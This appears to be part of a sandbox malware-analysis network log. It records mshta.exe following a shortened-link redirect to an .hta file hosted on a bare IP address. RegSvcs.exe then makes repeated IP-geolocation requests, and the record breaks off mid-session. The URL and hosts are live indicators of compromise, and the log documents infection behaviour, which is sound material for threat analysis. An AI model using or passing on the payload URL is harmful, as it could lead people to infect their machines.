                                                                                  2024-09-30 08:12:41 UTC851INHTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:41 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sf3DveMAx2%2Bd5JvpW7nq2sd3GALAzQk%2BgZWRa6VWGy9QJZnnMgAjM0FhyELmKKsee9ioYx%2Bhhj0NGd7B8Mn4PvpQiU8fYVLf2gXCjVpVU%2BUPjwlfiolz95M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bfd10d8441f3-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-09-30 08:12:41 UTC83INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 36 2f 78 61 6d 70 70 2f 63 72 69 6f 2f 49 45 6e 65 74 62 6f 6b 6b 77 6f 72 6b 69 6e 67 66 6f 72 75 70 64 61 74 65 2e 68 74 61
                                                                                  Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.2249169104.21.78.544433996C:\Windows\System32\mshta.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:42 UTC343OUTGET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:43 UTC823INHTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:43 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WWImi%2F%2B3CFy5%2F78tDZcL7ZszUnm%2Fe7XMDQPk9GjpB0vagIOw3LNhVx8LQudaO64P1jcNE9ClBL%2FFn3sTVRTu7KS7jFWNyOh6khpPROy9LrIR9ZaPJSUSB4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bfdee94341c1-EWR
                                                                                  2024-09-30 08:12:43 UTC83INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 36 2f 78 61 6d 70 70 2f 63 72 69 6f 2f 49 45 6e 65 74 62 6f 6b 6b 77 6f 72 6b 69 6e 67 66 6f 72 75 70 64 61 74 65 2e 68 74 61
                                                                                  Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.2249174188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:49 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:49 UTC670INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: EXPIRED
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daoQcWtu2eaBocRj4XKyG9H9vfuKNcTY4iPPqre%2FHI0NCztaYB4PfVX%2BQ%2FzwkEalkipvhNKpXT3q3zMlRePGhDY7BLgijzbtVuMxbaJwO4VMiVV0FVHjiagrSOiT7gYrTrR%2BLPoR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c006ee50431f-EWR
                                                                                  2024-09-30 08:12:49 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.2249175188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:50 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:12:50 UTC710INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:50 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fH%2FrIYJsVQcWFstM2lL%2FtyHWQjDp6mKhe%2FpGwaHcQk7l%2Btkki0COALq56m%2BGgTRGBpKzKr%2B0pT5apX03YWya0OO3hehCa79jY1WmGNzIxSj7sgKTk3JefF0aU8z8%2F64E4dK17FID"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c00ced398cbd-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-09-30 08:12:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.2249177188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:51 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:51 UTC672INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:51 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 2
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tk6smGenOnTb%2B9PQbY6nlsouAz0ohFe1dwrTtlhDkaZtqlMgkK0lDrIUPjw2u%2BFSQXEYsteqPXrckLuumnOahqQotU0qRM6Izw5TmYGgDb6zTrA9SLPVDv05eKO49t3V%2FWt5FcKn"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c018894b4374-EWR
                                                                                  2024-09-30 08:12:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.2249179188.114.97.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:53 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:12:53 UTC674INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 4
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7GbI1%2BYyxL62Z4amyHeLfDqlfgfjptN92Wxi9jXYSDijGo98wH1h9or6yfuQ5kwA5CDYSPy6LtgC4%2Fy54Uk7BtxK5ZGD5e4xwu%2Fok6k7IO4qsUwbi6tAolbA5%2FwlOOtj17PjedR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0214bf372b1-EWR
                                                                                  2024-09-30 08:12:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.2249181188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:54 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:54 UTC670INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:54 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 5
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC%2Fzfe1pHtrc%2Fyu3k2n2v3KMP191MDdKCt1hv9a2CCJoqvtOr4fIUcWmd0qV9MA0pxD65hSkPTwKpnNrW3rrUYuJALYBmh4XHcYEUsghs2ZivLKsNGu3lTRLeCDkFjzbClcSUiBB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c02abb188ccc-EWR
                                                                                  2024-09-30 08:12:54 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.2249183188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:56 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:56 UTC702INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:56 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 7
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2RYl%2BmAEswg9KdZKL0jrPFUsxBn0UcPuJCg3a%2BMpuBQbGJnpqtanOgUFv5iq5noVuLK9%2BrAmx10NVr8lAe1CSJeTA28EV8fbSnCxIT2jKrwR8F9ZOtEfiLO30c2O6zTO3rOz3Gnx"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c035abb6729e-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-09-30 08:12:56 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.2249185188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:12:58 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:58 UTC668INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:58 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 9
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHO1c4GyGQLL23LFAtcqgsVJob68zsam57UweUBfRv8pa9TDIbz4%2BRrqEaEpZGS9K2WBilwAQSyisoN8qSzKmuyJtsvurdklbLvsa7Sz1f7PBhcHL12dckHGBoikGAWaySDXTICK"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0407e8dc32f-EWR
                                                                                  2024-09-30 08:12:58 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.2249188188.114.96.34433108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:00 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:01 UTC667INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 11
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oeDfrxoV6okTkHE8AIj2nuBgrctrjQ7DUTxDV1LWh2B5UZpJXi04drRudpXKqxy1GlcS250RfBqAVrNstmUNiv81jSgPADwCzgZdwiApflKNBa2MA9OeaJlRamz07rDUxzMjyxZm"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0512ef518b8-EWR
                                                                                  2024-09-30 08:13:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.2249189188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
